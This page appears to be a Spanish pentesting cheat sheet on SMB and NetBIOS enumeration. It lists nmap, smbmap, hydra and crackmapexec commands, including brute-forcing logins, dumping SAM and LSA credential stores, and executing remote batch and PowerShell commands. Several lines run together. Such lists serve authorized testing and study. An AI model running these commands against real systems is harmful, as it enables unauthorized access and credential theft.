Enumeración
SMB y NetBIOS
nmap -sS -sU -p137,138,139,445 --open -Pn -n 192.168.1.1nbtstat -n
nbtstat -A 192.168.1.1
nbtstat -a hostnamenbtscan -v 192.168.1.1
nbtscan -v 192.168.1.0/24net view 192.168.1.1smbclient -L 192.168.1.1net use K: \\192.168.1.1\csmbmap -u 'admin' -p 'pass' -d MYGROUP -H 192.168.1.1
smbmap -u 'admin' -p 'pass' -H 192.168.1.1
smbmap -H 192.168.1.1
smbmap -u 'admin' -p 'pass' -d domain.com -H 192.168.1.1 -x 'ipconfig /all'
smbmap -L -u '' -p '' -H 192.168.1.1
smbmap -r -u '' -p '' -H 192.168.1.1nmblookup -A 192.168.1.1hydra -L users.txt -P /usr/share/john/password.lst 192.168.1.1 smb
hydra -L users.txt -P /usr/share/john/password.lst 192.168.1.1 smb -fcrackmapexec smb 192.168.1.1crackmapexec smb 192.168.1.1 -u '' -p '' --shares
crackmapexec smb 192.168.1.1 -u '' -p '' --local-auth --shares
crackmapexec smb 192.168.1.1 -u '' -p '' -d '' --shares
crackmapexec smb 192.168.1.1 -u '' -p '' --share share_name
crackmapexec smb 192.168.1.1 -u '' -p '' --sessions
crackmapexec smb 192.168.1.1 -u '' -p '' --disks
crackmapexec smb 192.168.1.1 -u '' -p '' --loggedon-users
crackmapexec smb 192.168.1.1 -u '' -p '' --pass-polcrackmapexec smb 192.168.1.1 -u '' -p '' -d '' --sam
crackmapexec smb 192.168.1.1 -u '' -p '' -d '' --lsacrackmapexec smb 192.168.1.1 -u '' -p '' -x BATCH_COMMAND
crackmapexec smb 192.168.1.1 -u '' -p '' -X PS_COMMANDNull Session
net use \\192.168.1.1\IPC$ "" /u:""winfo 192.168.1.1 -nFTP
SSH
SNMP
SMTP
RPC Bind y NFS
SQL
Web
Last updated